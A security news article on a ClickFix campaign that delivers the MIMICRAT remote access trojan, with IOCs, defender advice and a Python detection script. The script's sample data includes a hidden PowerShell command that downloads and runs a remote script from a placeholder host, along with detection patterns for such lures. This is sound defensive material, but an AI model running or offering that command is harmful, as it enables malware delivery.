ClickFix Campaign Compromises Legitimate Sites to Deploy MIMICRAT — A Custom C++ RAT With 22 Post-Exploitation Commands


Elastic Security Labs has disclosed a new ClickFix campaign that leverages compromised legitimate websites as delivery infrastructure to deploy a previously undocumented remote access trojan dubbed MIMICRAT (also tracked as AstarionRAT).

The campaign, discovered earlier this month, demonstrates significant operational sophistication — from multi-stage PowerShell chains that bypass Windows security controls to a custom C++ implant that communicates over HTTPS using HTTP profiles designed to mimic legitimate web analytics traffic.

The suspected end goal is ransomware deployment or data exfiltration.

Compromised Legitimate Sites as Delivery Infrastructure

The infection chain begins with compromised websites spanning multiple industries and geographies. In the case documented by Elastic, the entry point was bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript.

The injected script loads an externally hosted PHP script that serves a fake Cloudflare verification page — the signature ClickFix social engineering technique — instructing the victim to copy and paste a command into the Windows Run dialog to "verify" themselves.

The campaign supports 17 languages, with lure content dynamically localized based on the victim's browser language settings to maximize reach. Identified victims span multiple geographies, including a U.S.-based university and Chinese-speaking users documented in public forum discussions.

Multi-Stage Evasion Chain

The ClickFix lure triggers a PowerShell execution chain designed to systematically dismantle Windows defensive controls before payload delivery:

  1. Initial PowerShell command contacts the C2 server to retrieve a second-stage script
  2. ETW patching — disables Windows Event Tracing to blind security monitoring
  3. AMSI bypass — patches the Antimalware Scan Interface to prevent PowerShell script detection
  4. Lua-based loader — drops a Lua scripting engine that decrypts and executes shellcode entirely in memory
  5. MIMICRAT deployment — the final payload is loaded without touching disk

MIMICRAT Capabilities

MIMICRAT is a custom C++ implant with a comprehensive feature set across 22 commands for post-exploitation operations:

  • Windows token impersonation — escalate privileges by stealing tokens from other processes
  • SOCKS5 proxy tunneling — route attacker traffic through the victim's network
  • Process and file system control — enumerate, create, modify, and terminate processes and files
  • Interactive shell access — direct command-line access to the compromised system
  • Shellcode injection — inject and execute arbitrary code in remote processes
  • HTTPS C2 communication — all traffic flows over port 443 using HTTP profiles that resemble legitimate web analytics, blending into normal network traffic

Elastic assesses that the campaign shares tactical and infrastructural overlaps with a separate ClickFix campaign documented by Huntress that deploys the Matanbuchus 3.0 loader. That loader serves as a delivery mechanism for the same MIMICRAT implant, suggesting a shared operator or affiliate relationship between the two campaigns.

IOCs

  • Compromised site: bincheck[.]io
  • C2 communication: HTTPS over port 443 with web analytics-style HTTP profiles
  • Loader: Lua-based in-memory shellcode decryptor
  • Implant: MIMICRAT/AstarionRAT (C++ RAT, 22 commands)

Defender Recommendations

  • Monitor for ClickFix patterns — alert on PowerShell execution spawned from mshta.exe or the Windows Run dialog, particularly following browser activity
  • Detect ETW and AMSI tampering — flag processes that patch EtwEventWrite or AmsiScanBuffer in memory
  • Hunt for Lua script execution — Lua interpreters running in enterprise environments are anomalous and should be investigated
  • Inspect HTTPS traffic — look for C2 beaconing patterns disguised as web analytics on port 443
  • Block known infrastructure — add bincheck[.]io to blocklists until confirmed remediated
  • Review ClickFix awareness training — remind users that legitimate services never ask them to paste commands into the Run dialog
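A defender-side check for the first and third recommendations above, written as an added example rather than code from Elastic or this article: it matches constructed process-creation records (parent image, image, command line) and flags PowerShell launched from explorer.exe (the parent of anything run through the Run dialog) or mshta.exe with lure-style switches, plus any Lua interpreter execution. The sample records, process names and switch patterns are assumptions chosen for illustration.

```python
"""Flag process-creation events matching the ClickFix/MIMICRAT delivery chain.
All records below are constructed samples, not events from the campaign."""
import re

# Constructed sample events: the first three resemble the chain described in
# the article, the last two are benign activity that must not alert.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/s | iex"'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -c $x=(New-Object Net.WebClient)"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\Public\lua54.exe",
     "cmdline": "lua54.exe loader.lua"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "cmdline": "notepad++.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]

POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.I)
# lua.exe, lua54.exe, lua5.4-style names, luajit.exe: any of these is unusual on a workstation.
LUA = re.compile(r"(?:^|\\)lua(?:jit|\d{2,3})?\.exe$", re.I)
# Parents consistent with the ClickFix path: the Run dialog (explorer.exe) or an HTA host.
CLICKFIX_PARENTS = re.compile(r"(?:^|\\)(?:explorer|mshta)\.exe$", re.I)
# Switches and cmdlets typical of copy-paste lures; supporting evidence, not proof on their own.
SUSPICIOUS_SWITCHES = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}"
    r"|-ep\s+bypass|-nop\b|\biex\b|\biwr\b", re.I)


def classify(event: dict) -> list:
    """Return the detection names an event triggers; an empty list means no alert."""
    hits = []
    if (POWERSHELL.search(event["image"]) and CLICKFIX_PARENTS.search(event["parent"])
            and SUSPICIOUS_SWITCHES.search(event["cmdline"])):
        hits.append("clickfix_powershell_from_run_or_mshta")
    if LUA.search(event["image"]):
        hits.append("lua_interpreter_execution")
    return hits


def triage(events: list) -> list:
    """Keep only alerting events as (image, detections) pairs for analyst review."""
    return [(e["image"], classify(e)) for e in events if classify(e)]
```

In production the same logic would run over Sysmon Event ID 1 or Windows 4688 records; correlating the PowerShell alert with the subsequent Lua launch under the same process tree is what separates this chain from a lone admin script.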

By Zero Day Wire